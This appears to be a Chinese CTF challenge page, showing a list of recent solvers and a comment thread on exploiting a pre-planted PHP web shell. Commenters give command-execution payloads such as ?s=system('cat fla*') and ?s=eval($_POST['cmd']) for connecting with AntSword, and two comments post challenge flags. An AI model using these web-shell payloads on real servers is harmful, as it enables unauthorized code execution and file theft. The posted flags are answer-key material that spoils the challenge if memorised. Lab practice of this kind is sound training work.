评分(10)
解题动态
zz0607 攻破了该题 18分钟前
巴咕噜182 攻破了该题 2小时前
yang0000 攻破了该题 15小时前
chi 攻破了该题 21小时前
四叠半神话大系 攻破了该题 21小时前
11223 攻破了该题 23小时前
aboic 攻破了该题 1天前
YYYYHHHHNNNN 攻破了该题 1天前
chenwei001 攻破了该题 1天前
zzuer 攻破了该题 1天前
巧屿 攻破了该题 1天前
彭彭 攻破了该题 1天前
demonsong 攻破了该题 1天前
awesome 攻破了该题 2天前
star_evil 攻破了该题 2天前
JKyukino 攻破了该题 2天前
wwwwjjj 攻破了该题 2天前
daimaojiang 攻破了该题 2天前
jaaa 攻破了该题 2天前
评论
HK1ng 8月前
举报
根据描述就能看出已经上传了shell,让我们去利用即可,这里没有用菜刀连,直接手动构造,利用系统命令来实现s=system('ls'),然后可以看到当前目录有flaxxxxx,然后直接cat,s=system('cat fla*'),用一个模糊匹配。
zhwen 8月前
举报
简单PHP木马的利用,s=system("ls");
zfly 9月前
举报
?s=system('ls') ?s=system('cat fla*')
八一卜kod 9月前
举报
cat
freestyle 1年前
举报
s是传递的参数,get型号注入点,就是这么简单 ?s=system('ls')查看当前目录发现文件名,再通过cat、more、less、head、tail等查看文件内容
000ooo 1年前
举报
?s=eval+($_POST['123'])
ruien 1年前
举报
答案就在描述里,上传的s参数如果是字符串会被当命令执行
112356 1年前
举报
flag{0aa5253236aa8d97368bd753cb3c4cf2}
迷茫的三千面 1年前
举报
flag{f790b1679ece8cfe8ce3fc425c30896b}
星空 1年前
举报
?s=eval($_POST["cmd"]),再用蚁剑连